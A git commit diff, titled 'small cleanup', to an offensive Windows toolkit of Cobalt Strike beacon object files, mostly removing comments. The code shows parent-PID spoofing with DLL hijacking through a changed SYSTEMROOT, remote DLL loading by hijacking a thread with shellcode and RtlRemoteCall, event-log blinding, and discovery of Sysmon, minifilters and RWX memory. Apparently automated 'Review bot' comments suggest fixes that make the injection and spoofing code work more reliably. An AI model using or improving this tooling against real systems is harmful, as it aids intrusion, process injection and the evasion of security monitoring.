
small cleanup

unknown 2 ani în urmă
66368f4738

+ 0 - 15
KIT/BlindEventlog/blindeventlog.c

@@ -107,21 +107,6 @@ BOOL SetPrivilege(LPCTSTR lpszPrivilege, BOOL bEnablePrivilege) {
     TOKEN_PRIVILEGES tp;
     LUID luid;
 
-	/*
-	//alternative option if advapi32 isn't getting loaded
-	HMODULE hAdvapi32;
-    hAdvapi32 = KERNEL32$LoadLibraryA("Advapi32.dll");
-    if (hAdvapi32 == NULL) {
-        return FALSE;
-    }
-	
-    OpenProcessToken_t pOpenProcessToken = (OpenProcessToken_t)GetProcAddress(hAdvapi32, "OpenProcessToken");
-    if (pOpenProcessToken == NULL) {
-        return FALSE;
-    }
-    if (!pOpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) return FALSE;
-	*/
-	
 	if (!Advapi32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) return FALSE;
     if (!Advapi32$LookupPrivilegeValueA(NULL, lpszPrivilege, &luid)) return FALSE; 
 

+ 5 - 11
KIT/DllEnvHijacking/dllenvhijacking.c

@@ -88,33 +88,27 @@ BOOL RunProc(WCHAR *sysrootPath, char *targetProcPath, int pid) {
 	HANDLE hParentProcess = NULL;
 	BOOL setEnvSuccess = TRUE;
 	
-	//set env variable to new systemroot
 	if (KERNEL32$SetEnvironmentVariableW(L"SYSTEMROOT", sysrootPath) == 0) {
 		BeaconPrintf(CALLBACK_ERROR, "Failed to set the new environment variable!\n");
 		return FALSE; 
 	}
 	
-	// create fresh attributelist
 	KERNEL32$InitializeProcThreadAttributeList(NULL, 1, 0, &cbAttributeListSize); 
 	pAttributeList = (PPROC_THREAD_ATTRIBUTE_LIST) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, cbAttributeListSize);
 	KERNEL32$InitializeProcThreadAttributeList(pAttributeList, 1, 0, &cbAttributeListSize);
 
-	// copy and spoof parent process ID
 	hParentProcess = KERNEL32$OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
 	KERNEL32$UpdateProcThreadAttribute(pAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hParentProcess, sizeof(HANDLE), NULL, NULL);
 	info.lpAttributeList = pAttributeList;
 	
-	// start new process under spoofed process in suspended state
 	if (KERNEL32$CreateProcessA(NULL, targetProcPath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &info.StartupInfo, &processInfo) == 0) {
 		setEnvSuccess = FALSE;
 	}
 	
-	//reset environment variable for beacon
 	if (KERNEL32$SetEnvironmentVariableW(L"SYSTEMROOT", L"C:\\Windows\\") == 0) {
 		BeaconPrintf(CALLBACK_ERROR, "Failed to reset the old environment variable!\n");
 	}
 
-	//clean up
 	KERNEL32$DeleteProcThreadAttributeList(pAttributeList);
 	KERNEL32$CloseHandle(hParentProcess);
 	KERNEL32$CloseHandle(processInfo.hProcess);
@@ -131,11 +125,11 @@ int go(char *args, int len) {
 	WCHAR dllDstPath[100]; 
 	WCHAR dllSrcPath[100]; 
 	char targetProcPath[100];
-	WCHAR *sysrootPath; //L"C:\\Data\\";
-	WCHAR *proxyDll; //L"mswsock.dll"
-	WCHAR *inputDllSrcPath; //L"C:\\Users\\Public\\Documents\\"
-	char *targetProc; //"hostname.exe"
-	int *pid; //5456
+	WCHAR *sysrootPath; 
+	WCHAR *proxyDll; 
+	WCHAR *inputDllSrcPath; 
+	char *targetProc; 
+	int *pid; 
 	BOOL res = FALSE;
 	datap parser;
 	
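Review bot: The `hParentProcess` returned by `OpenProcess` goes straight into `UpdateProcThreadAttribute` with no NULL check, so a PID that cannot be opened leaves a NULL parent handle in the attribute list and only surfaces later as an unexplained `CreateProcessA` failure; add `if (hParentProcess == NULL) { BeaconPrintf(CALLBACK_ERROR, "Failed to open parent process!\n"); setEnvSuccess = FALSE; }` before the attribute update and skip the `CreateProcessA` call on that path, letting the environment reset and `DeleteProcThreadAttributeList` below still run. The reset at the end writes a hard-coded `C:\\Windows\\` rather than whatever SYSTEMROOT held before `RunProc` changed it; capturing the original with `GetEnvironmentVariableW` first, if the kit's header declares it, would make the reset faithful on hosts with a non-default system root. The deleted comments were the only description of the parent-PID spoofing flow in this function, and one line such as `// PPID spoof: the child inherits hParentProcess as its parent` above the `OpenProcess` call is worth keeping. `RunProc` begins before this hunk and its body continues past it.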

+ 2 - 12
KIT/FindDotnet/finddotnet.c

@@ -25,8 +25,7 @@ HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 		}
 	}
 
-	// For BOF we need to avoid large stack buffers, so put print buffer on heap.
-	if (g_lpwPrintBuffer <= (LPWSTR)1) { // Allocate once and free in BeaconOutputStreamW. 
+	if (g_lpwPrintBuffer <= (LPWSTR)1) { 
 		g_lpwPrintBuffer = (LPWSTR)MSVCRT$calloc(MAX_STRING, sizeof(WCHAR));
 		if (g_lpwPrintBuffer == NULL) {
 			hr = E_FAIL;
@@ -93,7 +92,7 @@ CleanUp:
 	}
 
 	if (g_lpwPrintBuffer != NULL) {
-		MSVCRT$free(g_lpwPrintBuffer); // Free print buffer.
+		MSVCRT$free(g_lpwPrintBuffer);
 		g_lpwPrintBuffer = NULL;
 	}
 
@@ -118,7 +117,6 @@ BOOL FindDotNet() {
 	LPCSTR procName;
 	WCHAR WCprocName[256];
 	
-	// resolve function addresses
 	NtGetNextProcess_t pNtGetNextProcess = (NtGetNextProcess_t) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtGetNextProcess");
 	NtOpenSection_t pNtOpenSection = (NtOpenSection_t) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtOpenSection");
 	if (pNtGetNextProcess == NULL || pNtOpenSection == NULL) {
@@ -126,32 +124,25 @@ BOOL FindDotNet() {
 		return -1;		
 	}
 	
-	// Most .NET processes have a handle open to a section named \BaseNamedObjects\Cor_Private_IPCBlock(_v4)_<ProcessId>.
 	WCHAR objPath[] = L"\\BaseNamedObjects\\Cor_Private_IPCBlock_v4_";
 	sectionName.Buffer = (PWSTR)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, 500);
 
-
 	BeaconPrintToStreamW(L"\nProcess name\t\t\t\t\t\tPID\n");
 	BeaconPrintToStreamW(L"=====================================================================\n");
 
-
-	// loop through all processes
 	while (!pNtGetNextProcess(currentProc, MAXIMUM_ALLOWED, 0, 0, &currentProc)) {
 		
 		pid = KERNEL32$GetProcessId(currentProc);
 		if (pid == 0) continue;		
 
-		// convert INT to WCHAR
 		USER32$wsprintfW(ProcNumber, L"%d", pid);
 
-		// and fill out UNICODE_STRING structure
 		MSVCRT$memset(sectionName.Buffer, 0, 500);
 		MSVCRT$memcpy(sectionName.Buffer, objPath, MSVCRT$wcslen(objPath) * 2);   // add section name "prefix"
 		KERNEL32$lstrcatW(sectionName.Buffer, ProcNumber);
 		sectionName.Length = MSVCRT$wcslen(sectionName.Buffer) * 2;		// finally, adjust the string size
 		sectionName.MaximumLength = sectionName.Length + 1;		
 	
-		// try to open the section - if exists, .NET process is found
 		InitializeObjectAttributes(&objectAttributes, &sectionName, OBJ_CASE_INSENSITIVE, NULL, NULL);
 
 		HANDLE sectionHandle = NULL;		
@@ -182,7 +173,6 @@ int go(void) {
 		BeaconPrintf(CALLBACK_ERROR, "No .NET process found!");
 	}
 	else {
-		//print data to CS console
 		BeaconOutputStreamW();
 	}
 	
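Review bot: `sectionName.MaximumLength = sectionName.Length + 1;` sets a byte count that is odd and one byte short of covering the terminating WCHAR, since `UNICODE_STRING` lengths are in bytes; it should read `sectionName.MaximumLength = sectionName.Length + sizeof(WCHAR);` (or simply 500, the size passed to `HeapAlloc`). That `HeapAlloc` result is also handed to `memset`/`memcpy` inside the loop without a NULL check. The removed comment about `\BaseNamedObjects\Cor_Private_IPCBlock_v4_<PID>` was the only explanation of why a successful `NtOpenSection` identifies a .NET process, so one line such as `// .NET (CLR v4) processes hold a section named Cor_Private_IPCBlock_v4_<pid>; open succeeds => .NET` above `objPath` is worth keeping. `FindDotNet` begins before this hunk and continues past it.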

+ 2 - 12
KIT/FindHandle/findhandle.c

@@ -21,8 +21,7 @@ HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 		}
 	}
 
-	// For BOF we need to avoid large stack buffers, so put print buffer on heap.
-	if (g_lpwPrintBuffer <= (LPWSTR)1) { // Allocate once and free in BeaconOutputStreamW. 
+	if (g_lpwPrintBuffer <= (LPWSTR)1) { 
 		g_lpwPrintBuffer = (LPWSTR)MSVCRT$calloc(MAX_STRING, sizeof(WCHAR));
 		if (g_lpwPrintBuffer == NULL) {
 			hr = E_FAIL;
@@ -89,7 +88,7 @@ CleanUp:
 	}
 
 	if (g_lpwPrintBuffer != NULL) {
-		MSVCRT$free(g_lpwPrintBuffer); // Free print buffer.
+		MSVCRT$free(g_lpwPrintBuffer); 
 		g_lpwPrintBuffer = NULL;
 	}
 
@@ -122,7 +121,6 @@ BOOL GetHandles(int basePid, const BYTE flags, int targetPid) {
     NtDuplicateObject_t pNtDuplicateObject = (NtDuplicateObject_t) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtDuplicateObject");
     NtQueryObject_t pNtQueryObject = (NtQueryObject_t) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryObject");
 
-	// parse which handle types extract
 	WCHAR Filter[100];
 	switch(flags) {
 		case QUERY_PROC:	MSVCRT$swprintf_s(Filter, 50, L"%s", L"Process"); break;
@@ -147,13 +145,10 @@ BOOL GetHandles(int basePid, const BYTE flags, int targetPid) {
         UNICODE_STRING objectName;
         ULONG returnLength;
 		
-		//Skip system processes
 		if(objHandle.UniqueProcessId == 4) continue;
 		
-		//p2h: if the process doens't match the basePid, go to the next
         if ((basePid != 0) && (objHandle.UniqueProcessId != basePid)) continue;
 		
-		//all: for some reason handles dont fully close if the tool is finshed in COFF. This will skip all the handles from the previous enumeration task
 		if (objHandle.UniqueProcessId == KERNEL32$GetCurrentProcessId()) continue;
  
  
@@ -199,7 +194,6 @@ BOOL GetHandles(int basePid, const BYTE flags, int targetPid) {
 			}
 		}
 		
-		//h2p: if the process doens't match the targetPid, go to the next
 		if (targetPid != 0 && targetPid != procID) {
 			MSVCRT$free(objectTypeInfo);
 			MSVCRT$free(objectNameInfo);
@@ -207,7 +201,6 @@ BOOL GetHandles(int basePid, const BYTE flags, int targetPid) {
 			continue;
 		}
 		
-		//if the PID of the handle is 0 or pointing to itself, skip it otherwise print output to stream
 		if(procID != 0 && objHandle.UniqueProcessId != procID) {
 			WCHAR WprocHostName[100];
 			WCHAR WprocNameTemp[100];
@@ -250,9 +243,6 @@ int go(char *args, int len) {
 	search = BeaconDataExtract(&parser, NULL);
 	query = BeaconDataExtract(&parser, NULL);
 
-	//BeaconPrintf(CALLBACK_OUTPUT, "search: %s\n", search); //DEBUG
-	//BeaconPrintf(CALLBACK_OUTPUT, "query: %s\n", query); //DEBUG
-
 	if (MSVCRT$strcmp(query, "proc") == 0) flags = QUERY_PROC;
 	else if (MSVCRT$strcmp(query, "thread") == 0) flags = QUERY_THREAD;
 	else {
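Review bot: The three bare `continue` filters at the top of the `GetHandles` loop lose their rationale with this cleanup, and the self-PID skip in particular is a workaround rather than an obvious filter: the deleted comment recorded that handles from a previous run of this BOF stay open in the beacon process and would otherwise be re-listed. Keep one line above it, e.g. `// skip our own process: handles left open by earlier runs of this BOF would be re-listed`, and `// PID 4 is the System process` above the `== 4` check so the magic number is explained. `GetHandles` begins before this hunk and its body continues past it.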

+ 4 - 5
KIT/FindLib/findlib.c

@@ -10,7 +10,7 @@
 #pragma comment(lib, "Shlwapi.lib")
 
 
-//Code from: https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
 HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 	HRESULT hr = S_FALSE;
 	va_list argList;
@@ -23,8 +23,7 @@ HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 		}
 	}
 
-	// For BOF we need to avoid large stack buffers, so put print buffer on heap.
-	if (g_lpwPrintBuffer <= (LPWSTR)1) { // Allocate once and free in BeaconOutputStreamW. 
+	if (g_lpwPrintBuffer <= (LPWSTR)1) {
 		g_lpwPrintBuffer = (LPWSTR)MSVCRT$calloc(MAX_STRING, sizeof(WCHAR));
 		if (g_lpwPrintBuffer == NULL) {
 			hr = E_FAIL;
@@ -56,7 +55,7 @@ CleanUp:
 	return hr;
 }
 
-//Code from: https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
 VOID BeaconOutputStreamW() {
 	STATSTG ssStreamData = { 0 };
 	SIZE_T cbSize = 0;
@@ -91,7 +90,7 @@ CleanUp:
 	}
 
 	if (g_lpwPrintBuffer != NULL) {
-		MSVCRT$free(g_lpwPrintBuffer); // Free print buffer.
+		MSVCRT$free(g_lpwPrintBuffer); 
 		g_lpwPrintBuffer = NULL;
 	}
 

+ 4 - 9
KIT/FindRWX/findrwx.c

@@ -6,7 +6,7 @@
 #include "findrwx.h"
 
 
-//Code from: https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
 HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 	HRESULT hr = S_FALSE;
 	va_list argList;
@@ -19,8 +19,7 @@ HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 		}
 	}
 
-	// For BOF we need to avoid large stack buffers, so put print buffer on heap.
-	if (g_lpwPrintBuffer <= (LPWSTR)1) { // Allocate once and free in BeaconOutputStreamW. 
+	if (g_lpwPrintBuffer <= (LPWSTR)1) { 
 		g_lpwPrintBuffer = (LPWSTR)MSVCRT$calloc(MAX_STRING, sizeof(WCHAR));
 		if (g_lpwPrintBuffer == NULL) {
 			hr = E_FAIL;
@@ -52,7 +51,7 @@ CleanUp:
 	return hr;
 }
 
-//Code from: https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
 VOID BeaconOutputStreamW() {
 	STATSTG ssStreamData = { 0 };
 	SIZE_T cbSize = 0;
@@ -87,7 +86,7 @@ CleanUp:
 	}
 
 	if (g_lpwPrintBuffer != NULL) {
-		MSVCRT$free(g_lpwPrintBuffer); // Free print buffer.
+		MSVCRT$free(g_lpwPrintBuffer);
 		g_lpwPrintBuffer = NULL;
 	}
 
@@ -99,7 +98,6 @@ CleanUp:
 }
 
 
-//find RWX memory region in found .NET process
 BOOL FindRWX(HANDLE hProcess) {
 	
 	BOOL foundRWX = FALSE;
@@ -116,11 +114,9 @@ BOOL FindRWX(HANDLE hProcess) {
 	BeaconPrintToStreamW(L"\nMemory address\t\t\tByte size\n");
 	BeaconPrintToStreamW(L"================================================\n");
 	
-	// query remote process memory information
 	while (KERNEL32$VirtualQueryEx(hProcess, addr, &mbi, sizeof(mbi))) {
 		addr = (LPVOID)((DWORD_PTR) mbi.BaseAddress + mbi.RegionSize);
 
-		// look for RWX memory regions which are not backed by an image
 		if (mbi.Protect == PAGE_EXECUTE_READWRITE && mbi.State == MEM_COMMIT && mbi.Type == MEM_PRIVATE) {
 			BeaconPrintToStreamW(L"%#-30llx\t%#7llu\n", mbi.BaseAddress, mbi.RegionSize);
 			foundRWX = TRUE;
@@ -154,7 +150,6 @@ void go(char *args, int len) {
 		BeaconPrintf(CALLBACK_ERROR, "No READ, WRITE, EXECUTE memory region found in the specified process!");
 	}
 	else {
-		//print data to CS console
 		BeaconOutputStreamW();
 		BeaconPrintf(CALLBACK_OUTPUT, "\n[+] DONE");
 	}
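Review bot: `BeaconPrintToStreamW(L"%#-30llx\t%#7llu\n", mbi.BaseAddress, mbi.RegionSize)` passes a `PVOID` and a `SIZE_T` to `%llx`/`%llu`, which only matches their width on 64-bit builds; since the kit guards 32-bit paths elsewhere with `#ifdef _WIN64`, cast explicitly: `(unsigned long long)(ULONG_PTR)mbi.BaseAddress, (unsigned long long)mbi.RegionSize`. The deleted comment was the only statement of why `MEM_PRIVATE` is part of the filter, namely to exclude image-backed RWX sections, and one line such as `// committed private RWX only; image-backed regions are not reported` above the `if` is worth keeping. `FindRWX` begins before this hunk and continues past it.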

+ 5 - 13
KIT/FindSysmon/findsysmon.c

@@ -10,7 +10,7 @@
 
 
 
-//Code from: https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
 HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 	HRESULT hr = S_FALSE;
 	va_list argList;
@@ -55,7 +55,7 @@ CleanUp:
 	return hr;
 }
 
-//Code from: https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
 VOID BeaconOutputStreamW() {
 	STATSTG ssStreamData = { 0 };
 	SIZE_T cbSize = 0;
@@ -100,9 +100,7 @@ CleanUp:
 }
 
 
-
-
-//https://gist.githubusercontent.com/stevemk14ebr/af8053c506ef895cd520f8017a81f913/raw/98944bc6ae995229d5231568a8ae73dd287e8b4f/guids
+//IID: https://gist.githubusercontent.com/stevemk14ebr/af8053c506ef895cd520f8017a81f913/raw/98944bc6ae995229d5231568a8ae73dd287e8b4f/guids
 BOOL PrintSysmonPID(wchar_t * guid) {
 	HRESULT hr = S_OK;
 	ITraceDataProvider *itdProvider = NULL;
@@ -118,13 +116,13 @@ BOOL PrintSysmonPID(wchar_t * guid) {
 	hr = OLE32$CoCreateInstance(&CTraceDataProvider, 0, CLSCTX_INPROC_SERVER, &IIDITraceDataProvider, (LPVOID *) &itdProvider); 
 	if(FAILED(hr))
 	{
-		//BeaconPrintf(CALLBACK_ERROR,"Failed to create instance of object: %lX", hr);
+		BeaconPrintf(CALLBACK_ERROR,"Failed to create instance of object: %lX", hr);
 	}
 	
 	hr = itdProvider->lpVtbl->Query(itdProvider, guid, NULL);
 	if(FAILED(hr))
 	{
-		//BeaconPrintf(CALLBACK_ERROR,"Failed to query the process based on the GUID: %lX\n", hr);
+		BeaconPrintf(CALLBACK_ERROR,"Failed to query the process based on the GUID: %lX\n", hr);
 	}
 	IValueMap *ivmProcesses = NULL;
 	hr = itdProvider->lpVtbl->GetRegisteredProcesses(itdProvider, &ivmProcesses);
@@ -218,12 +216,10 @@ BOOL FindSysmon() {
         status = TDH$TdhEnumerateProviders(penum, &BufferSize);
     }
 	
-	//AANPASSEN
     if (status != ERROR_SUCCESS) 
 		BeaconPrintf(CALLBACK_ERROR,"TdhEnumerateProviders failed.\n");
 	
     else {
-        // search for Sysmon guid
         for (DWORD i = 0; i < penum->NumberOfProviders; i++) {
             hr = OLE32$StringFromGUID2(&penum->TraceProviderInfoArray[i].ProviderGuid, StringGuid, ARRAYSIZE(StringGuid));
             if (FAILED(hr)) return FALSE;
@@ -264,21 +260,18 @@ int PrintMiniFilterData(FILTER_AGGREGATE_STANDARD_INFORMATION * lpFilterInfo) {
 	
 	fltInfo = (FILTER_AGGREGATE_STANDARD_INFORMATION *) lpFilterInfo;
 
-	// convert Filter name
 	int fltName_size = fltInfo->Type.MiniFilter.FilterNameLength;
 	LONGLONG src = ((LONGLONG) lpFilterInfo) + fltInfo->Type.MiniFilter.FilterNameBufferOffset;
 	fltName = (char *) MSVCRT$malloc(fltName_size + 2);
 	MSVCRT$memset(fltName, 0, fltName_size + 2);
 	MSVCRT$memcpy(fltName, (void *) src, fltName_size);
 	
-	// convert Filter altitude
 	int fltAlt_size = fltInfo->Type.MiniFilter.FilterAltitudeLength;
 	src = ((LONGLONG) lpFilterInfo) + fltInfo->Type.MiniFilter.FilterAltitudeBufferOffset;
 	fltAlt = (char *) MSVCRT$malloc(fltAlt_size + 2);
 	MSVCRT$memset(fltAlt, 0, fltAlt_size + 2);
 	MSVCRT$memcpy(fltAlt, (void *) src, fltAlt_size);	
 	
-	// print only data about minifilters
 	if (fltInfo->Flags == FLTFL_ASI_IS_MINIFILTER) {
 		BeaconPrintToStreamW(L"%-29s%s\t%26d\n", fltName, fltAlt, fltInfo->Type.MiniFilter.NumberOfInstances);
 	}
@@ -306,7 +299,6 @@ BOOL FindMiniFilters() {
 	PrintMiniFilterData((FILTER_AGGREGATE_STANDARD_INFORMATION *) lpFilterInfo);
 	foundMinifilter = TRUE;
 
-	
 	while(true) {
 		res = Fltlib$FilterFindNext(hFilterFind, FilterAggregateStandardInformation, lpFilterInfo, dwFilterInfoSize, &dwBytesReturned);
 		if (res == HRESULT_FROM_WIN32(ERROR_NO_MORE_ITEMS)) break;
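Review bot: Re-enabling the two `BeaconPrintf(CALLBACK_ERROR, ...)` calls in `PrintSysmonPID` reports the failure but does not stop on it: when `CoCreateInstance` fails, `itdProvider` is still NULL and the very next statement dereferences it via `itdProvider->lpVtbl->Query`, and a failed `Query` is followed by `GetRegisteredProcesses` on a provider that was never bound to the GUID. Each error branch should end with `return FALSE;`, releasing whatever the function initialised earlier (outside this hunk) on that path. `PrintSysmonPID` begins before the hunk and continues past it.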

+ 2 - 18
KIT/LoadLib/loadlib.c

@@ -28,16 +28,13 @@ int FindThreadID(int pid){
 
 
 typedef struct _API_REMOTE_CALL {
-	// remote API call return value
 	size_t		retval;
 	
-	// standard function to call at the end of the shellcode
 	NtContinue_t ntContinue;
 	CONTEXT		context;
 	
-	// remote function to call - adjust the types!
 	LoadLibraryA_t ARK_func;
-	char		param1[100];				// LPCSTR
+	char		param1[100]; // LPCSTR
 	
 } ApiReeKall;
 
@@ -59,7 +56,6 @@ size_t MakeReeKall(HANDLE hProcess, HANDLE hThread, ApiReeKall ark) {
 					};
 	int prolog_size = sizeof(prolog);
 	
-	// resolve needed API pointers
 	RtlRemoteCall_t pRtlRemoteCall = (RtlRemoteCall_t) GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlRemoteCall");
 	NtContinue_t pNtContinue = (NtContinue_t) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtContinue");
 	
@@ -68,45 +64,38 @@ size_t MakeReeKall(HANDLE hProcess, HANDLE hThread, ApiReeKall ark) {
 		return -1;		
 	}
 	
-	// allocate some space in the target for our shellcode
 	void * remote_mem = KERNEL32$VirtualAllocEx(hProcess, 0, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 	if (remote_mem == NULL) {
 		BeaconPrintf(CALLBACK_ERROR, "Error allocating remote memory!\n");
 		return -1;
 	}
 	
-	// calculate the size of our shellcode
 	size_t sc_size = (size_t) SHELLCODE_END - (size_t) SHELLCODE;
 	
 	size_t bOut = 0;
 #ifdef _WIN64 
-	// first, write prolog, if the process is 64-bit
 	if (KERNEL32$WriteProcessMemory(hProcess, remote_mem, prolog, prolog_size, (SIZE_T *) &bOut) == 0) {
 		KERNEL32$VirtualFreeEx(hProcess, remote_mem, 0, MEM_RELEASE);
 		BeaconPrintf(CALLBACK_ERROR, "Error writing remote memory (prolog)!\n");
 		return -1;
 	}
 #else
-	// otherwise, ignore the prolog
 	prolog_size = 0;
 #endif
-	// write the main payload
 	if (KERNEL32$WriteProcessMemory(hProcess, (char *) remote_mem + prolog_size, &SHELLCODE, sc_size, (SIZE_T *) &bOut) == 0) {
 		KERNEL32$VirtualFreeEx(hProcess, remote_mem, 0, MEM_RELEASE);
 		BeaconPrintf(CALLBACK_ERROR, "Error writing remote memory (shellcode)!\n");
 		return -1;
 	}
 	
-	// set remaining data in ApiReeKall struct - NtContinue with a thread context we're hijacking
 	ark.retval = RETVAL_TAG;
 	ark.ntContinue = pNtContinue;
 	ark.context.ContextFlags = CONTEXT_FULL;
 	KERNEL32$SuspendThread(hThread);
 	KERNEL32$GetThreadContext(hThread, &ark.context);
 
-	// prepare an argument to be passed to our shellcode
 	ApiReeKall * ark_arg;
-	ark_arg = (ApiReeKall  *) ((size_t) remote_mem + sc_size + prolog_size + 4);		// align to 0x10
+	ark_arg = (ApiReeKall  *) ((size_t) remote_mem + sc_size + prolog_size + 4);
 	if (KERNEL32$WriteProcessMemory(hProcess, ark_arg, &ark, sizeof(ApiReeKall), 0) == 0) {
 		KERNEL32$VirtualFreeEx(hProcess, remote_mem, 0, MEM_RELEASE);
 		KERNEL32$ResumeThread(hThread);
@@ -114,7 +103,6 @@ size_t MakeReeKall(HANDLE hProcess, HANDLE hThread, ApiReeKall ark) {
 		return -1;		
 	}
 
-	// if all is set, make a remote call
 	NTSTATUS status = pRtlRemoteCall(hProcess, hThread, remote_mem, 1, (PULONG) &ark_arg, 1, 1);
 	if (status != 0) {
 		BeaconPrintf(CALLBACK_ERROR, "Failed RtlRemoteCall with status code: %x\n", status);
@@ -125,7 +113,6 @@ size_t MakeReeKall(HANDLE hProcess, HANDLE hThread, ApiReeKall ark) {
 	BeaconPrintf(CALLBACK_OUTPUT, "[+] Made successful remote RPC call with status code: %x\n[*] Wait for the RPC call to be triggered in the remote process..\n", status);
 	KERNEL32$ResumeThread(hThread);
 	
-	// get the remote API call return value
 	size_t ret = 0;
 	while(TRUE) {
 		KERNEL32$Sleep(1000);
@@ -155,7 +142,6 @@ void go(char *args, int len){
 		return -1;		
 	}
 	
-	// open both process and thread in the remote target
 	HANDLE hProcess = KERNEL32$OpenProcess(PROCESS_ALL_ACCESS, 0, pID);
 	HANDLE hThread = KERNEL32$OpenThread(THREAD_ALL_ACCESS, 0, tID);
 	if (hProcess == NULL || hThread == NULL) {
@@ -164,7 +150,6 @@ void go(char *args, int len){
 	}
 	BeaconPrintf(CALLBACK_OUTPUT, "[+] Got handle to remote process and thread!\n");
 	
-	// prepare a ApiReeKall struct with a function to call
 	ApiReeKall ark = { 0 };
 	ark.ARK_func = (LoadLibraryA_t) GetProcAddress(LoadLibrary("kernel32.dll"), "LoadLibraryA");
 	MSVCRT$strcpy_s(ark.param1, 100, pathToDLL);
@@ -174,7 +159,6 @@ void go(char *args, int len){
 		BeaconPrintf(CALLBACK_OUTPUT, "[+] Received call confirmation. DLL should be loaded!\n", ret);
 	}
 
-	// cleanup
 	KERNEL32$CloseHandle(hThread);
 	KERNEL32$CloseHandle(hProcess);
 
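Review bot: `ark_arg = (ApiReeKall *)((size_t)remote_mem + sc_size + prolog_size + 4)` lands on a 16-byte boundary only when `sc_size + prolog_size` happens to be congruent to 12 mod 16, and the deleted `// align to 0x10` comment was the sole record that alignment was intended; the `CONTEXT` inside `ApiReeKall` is what `NtContinue` consumes and on x64 it requires 16-byte alignment, so compute it explicitly: `ark_arg = (ApiReeKall *)(((size_t)remote_mem + sc_size + prolog_size + 0xF) & ~(size_t)0xF);`. This assumes the 64-bit layout of `retval` and `ntContinue` (8 bytes each) places `context` at offset 16 so that aligning the struct aligns the `CONTEXT`; worth a `_Static_assert` or a comment if that is relied upon. `MakeReeKall` begins before this hunk and continues past it.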

+ 5 - 11
KIT/PSremote/psremote.c

@@ -6,7 +6,7 @@
 
 
 
-//Code from: https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
 HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 	HRESULT hr = S_FALSE;
 	va_list argList;
@@ -19,8 +19,7 @@ HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 		}
 	}
 
-	// For BOF we need to avoid large stack buffers, so put print buffer on heap.
-	if (g_lpwPrintBuffer <= (LPWSTR)1) { // Allocate once and free in BeaconOutputStreamW. 
+	if (g_lpwPrintBuffer <= (LPWSTR)1) {  
 		g_lpwPrintBuffer = (LPWSTR)MSVCRT$calloc(MAX_STRING, sizeof(WCHAR));
 		if (g_lpwPrintBuffer == NULL) {
 			hr = E_FAIL;
@@ -45,14 +44,14 @@ HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 CleanUp:
 
 	if (g_lpwPrintBuffer != NULL) {
-		MSVCRT$memset(g_lpwPrintBuffer, 0, MAX_STRING * sizeof(WCHAR)); // Clear print buffer.
+		MSVCRT$memset(g_lpwPrintBuffer, 0, MAX_STRING * sizeof(WCHAR)); 
 	}
 
 	va_end(argList);
 	return hr;
 }
 
-//Code from: https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
 VOID BeaconOutputStreamW() {
 	STATSTG ssStreamData = { 0 };
 	SIZE_T cbSize = 0;
@@ -77,7 +76,6 @@ VOID BeaconOutputStreamW() {
 		}
 
 		BeaconPrintf(CALLBACK_OUTPUT, "%ls", lpwOutput);
-		//BeaconPrintf(CALLBACK_OUTPUT, "DONE"); //DEBUG
 	}
 
 CleanUp:
@@ -88,7 +86,7 @@ CleanUp:
 	}
 
 	if (g_lpwPrintBuffer != NULL) {
-		MSVCRT$free(g_lpwPrintBuffer); // Free print buffer.
+		MSVCRT$free(g_lpwPrintBuffer); 
 		g_lpwPrintBuffer = NULL;
 	}
